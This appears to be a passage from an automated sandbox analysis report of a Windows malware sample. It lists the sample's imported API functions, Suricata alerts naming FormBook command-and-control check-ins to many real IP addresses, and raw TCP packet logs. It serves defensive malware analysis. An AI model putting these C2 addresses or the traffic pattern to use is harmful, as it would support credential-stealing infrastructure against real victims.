                                                                                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                    GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                    OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain
                                                                                                                    EnglishUnited States

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-09-30T19:56:59.678961+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54971254.67.87.11080TCP
                                                                                                                    2024-09-30T19:57:15.567301+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549713195.161.68.880TCP
                                                                                                                    2024-09-30T19:57:18.204526+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549714195.161.68.880TCP
                                                                                                                    2024-09-30T19:57:20.890904+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549715195.161.68.880TCP
                                                                                                                    2024-09-30T19:57:23.296669+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549716195.161.68.880TCP
                                                                                                                    2024-09-30T19:57:30.046246+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971718.141.10.10780TCP
                                                                                                                    2024-09-30T19:57:32.812279+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971818.141.10.10780TCP
                                                                                                                    2024-09-30T19:57:35.668161+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54971918.141.10.10780TCP
                                                                                                                    2024-09-30T19:57:38.033225+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54972018.141.10.10780TCP
                                                                                                                    2024-09-30T19:57:38.042145+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549720TCP
                                                                                                                    2024-09-30T19:57:44.965155+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549721197.189.237.18680TCP
                                                                                                                    2024-09-30T19:57:47.511999+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549722197.189.237.18680TCP
                                                                                                                    2024-09-30T19:57:50.059160+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549723197.189.237.18680TCP
                                                                                                                    2024-09-30T19:57:52.647870+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549724197.189.237.18680TCP
                                                                                                                    2024-09-30T19:58:01.229295+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549725203.175.9.12880TCP
                                                                                                                    2024-09-30T19:58:03.824658+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549726203.175.9.12880TCP
                                                                                                                    2024-09-30T19:58:06.299872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549727203.175.9.12880TCP
                                                                                                                    2024-09-30T19:58:08.840099+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549728203.175.9.12880TCP
                                                                                                                    2024-09-30T19:58:14.598245+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549729162.0.238.24680TCP
                                                                                                                    2024-09-30T19:58:17.157457+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549730162.0.238.24680TCP
                                                                                                                    2024-09-30T19:58:19.707879+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549731162.0.238.24680TCP
                                                                                                                    2024-09-30T19:58:22.257209+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549732162.0.238.24680TCP
                                                                                                                    2024-09-30T19:58:28.107637+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973331.31.196.1780TCP
                                                                                                                    2024-09-30T19:58:30.695961+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973431.31.196.1780TCP
                                                                                                                    2024-09-30T19:58:33.215000+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973531.31.196.1780TCP
                                                                                                                    2024-09-30T19:58:35.790023+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54973631.31.196.1780TCP
                                                                                                                    2024-09-30T19:58:41.825941+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973752.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:44.220847+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973852.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:46.816695+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973952.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:49.264413+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54974052.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:54.789242+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549741188.114.96.380TCP
                                                                                                                    2024-09-30T19:58:57.350011+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549742188.114.96.380TCP
                                                                                                                    2024-09-30T19:58:59.906012+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549743188.114.96.380TCP
                                                                                                                    2024-09-30T19:59:02.420341+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549744188.114.96.380TCP
                                                                                                                    2024-09-30T19:59:08.371769+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549745206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:10.895681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549746206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:13.747761+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549747206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:16.060399+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549748206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:23.008354+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974946.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:25.283608+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54975046.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:27.968098+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54975146.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:30.352231+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54975246.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:36.955960+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497533.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:38.529681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497543.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:42.136872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497553.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:43.857945+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497563.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:49.473446+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549757144.34.186.8580TCP
                                                                                                                    2024-09-30T19:59:52.046037+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549758144.34.186.8580TCP
                                                                                                                    2024-09-30T19:59:54.594100+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549759144.34.186.8580TCP
                                                                                                                    2024-09-30T19:59:57.106812+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549760144.34.186.8580TCP
                                                                                                                    2024-09-30T20:00:03.141019+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549761136.143.186.1280TCP
                                                                                                                    2024-09-30T20:00:05.664801+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549762136.143.186.1280TCP
                                                                                                                    2024-09-30T20:00:08.221746+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549763136.143.186.1280TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Sep 30, 2024 19:56:59.071042061 CEST4971280192.168.2.554.67.87.110
                                                                                                                    Sep 30, 2024 19:56:59.077207088 CEST804971254.67.87.110192.168.2.5
                                                                                                                    Sep 30, 2024 19:56:59.077294111 CEST4971280192.168.2.554.67.87.110
                                                                                                                    Sep 30, 2024 19:56:59.084404945 CEST4971280192.168.2.554.67.87.110
                                                                                                                    Sep 30, 2024 19:56:59.089755058 CEST804971254.67.87.110192.168.2.5
                                                                                                                    Sep 30, 2024 19:56:59.678790092 CEST804971254.67.87.110192.168.2.5
                                                                                                                    Sep 30, 2024 19:56:59.678817987 CEST804971254.67.87.110192.168.2.5
                                                                                                                    Sep 30, 2024 19:56:59.678961039 CEST4971280192.168.2.554.67.87.110
                                                                                                                    Sep 30, 2024 19:56:59.682460070 CEST4971280192.168.2.554.67.87.110
                                                                                                                    Sep 30, 2024 19:56:59.698856115 CEST804971254.67.87.110192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:14.849895954 CEST4971380192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:14.854995012 CEST8049713195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:14.855108976 CEST4971380192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:14.864094019 CEST4971380192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:14.868900061 CEST8049713195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:15.566796064 CEST8049713195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:15.567224979 CEST8049713195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:15.567301035 CEST4971380192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:16.371373892 CEST4971380192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:17.390335083 CEST4971480192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:17.467246056 CEST8049714195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:17.467349052 CEST4971480192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:17.477968931 CEST4971480192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:17.482856035 CEST8049714195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:18.204229116 CEST8049714195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:18.204406977 CEST8049714195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:18.204525948 CEST4971480192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:18.980799913 CEST4971480192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:19.999636889 CEST4971580192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:20.004801989 CEST8049715195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:20.004894018 CEST4971580192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:20.015578032 CEST4971580192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:20.021971941 CEST8049715195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:20.022461891 CEST8049715195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:20.890121937 CEST8049715195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:20.890829086 CEST8049715195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:20.890903950 CEST4971580192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:21.527527094 CEST4971580192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:22.547219992 CEST4971680192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:22.552313089 CEST8049716195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:22.552397966 CEST4971680192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:22.559343100 CEST4971680192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:22.564177036 CEST8049716195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:23.296463013 CEST8049716195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:23.296612024 CEST8049716195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:23.296669006 CEST4971680192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:23.306020975 CEST4971680192.168.2.5195.161.68.8
                                                                                                                    Sep 30, 2024 19:57:23.312506914 CEST8049716195.161.68.8192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:28.693136930 CEST4971780192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:28.698107004 CEST804971718.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:28.698194981 CEST4971780192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:28.708139896 CEST4971780192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:28.713017941 CEST804971718.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:30.045977116 CEST804971718.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:30.046073914 CEST804971718.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:30.046246052 CEST4971780192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:30.215188980 CEST4971780192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:31.314177036 CEST4971880192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:31.476763964 CEST804971818.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:31.476871014 CEST4971880192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:31.517009020 CEST4971880192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:31.523260117 CEST804971818.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:32.812064886 CEST804971818.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:32.812206984 CEST804971818.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:32.812278986 CEST4971880192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:33.027916908 CEST4971880192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:34.142404079 CEST4971980192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:34.147430897 CEST804971918.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:34.147550106 CEST4971980192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:34.158343077 CEST4971980192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:34.163834095 CEST804971918.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:34.163865089 CEST804971918.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:35.668160915 CEST4971980192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:35.673782110 CEST804971918.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:35.677843094 CEST4971980192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:36.686963081 CEST4972080192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:36.691997051 CEST804972018.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:36.692100048 CEST4972080192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:36.699052095 CEST4972080192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:36.704051971 CEST804972018.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:38.032759905 CEST804972018.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:38.033116102 CEST804972018.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:38.033225060 CEST4972080192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:38.035835981 CEST4972080192.168.2.518.141.10.107
                                                                                                                    Sep 30, 2024 19:57:38.042145014 CEST804972018.141.10.107192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:43.446829081 CEST4972180192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:43.451669931 CEST8049721197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:43.451772928 CEST4972180192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:43.462918043 CEST4972180192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:43.467760086 CEST8049721197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:44.965154886 CEST4972180192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:44.970400095 CEST8049721197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:44.970462084 CEST4972180192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:45.984467030 CEST4972280192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:45.989439011 CEST8049722197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:45.990370035 CEST4972280192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:46.000499964 CEST4972280192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:46.005306959 CEST8049722197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:47.511998892 CEST4972280192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:47.745553970 CEST8049722197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:47.745672941 CEST4972280192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:48.530210018 CEST4972380192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:48.538332939 CEST8049723197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:48.538438082 CEST4972380192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:48.548779964 CEST4972380192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:48.553638935 CEST8049723197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:48.553814888 CEST8049723197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:50.059159994 CEST4972380192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:50.064459085 CEST8049723197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:50.064543962 CEST4972380192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:51.077963114 CEST4972480192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:51.083137035 CEST8049724197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:51.083354950 CEST4972480192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:51.090662956 CEST4972480192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:51.099509001 CEST8049724197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:52.647377968 CEST8049724197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:52.647778034 CEST8049724197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:52.647870064 CEST4972480192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:52.651660919 CEST4972480192.168.2.5197.189.237.186
                                                                                                                    Sep 30, 2024 19:57:52.656455994 CEST8049724197.189.237.186192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:59.749810934 CEST4972580192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:57:59.754611015 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:57:59.757895947 CEST4972580192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:57:59.769814968 CEST4972580192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:57:59.774621010 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.228718996 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.228744984 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.228970051 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.228981972 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.228992939 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.229285002 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.229295015 CEST4972580192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:01.229298115 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.229307890 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.229347944 CEST4972580192.168.2.5203.175.9.128
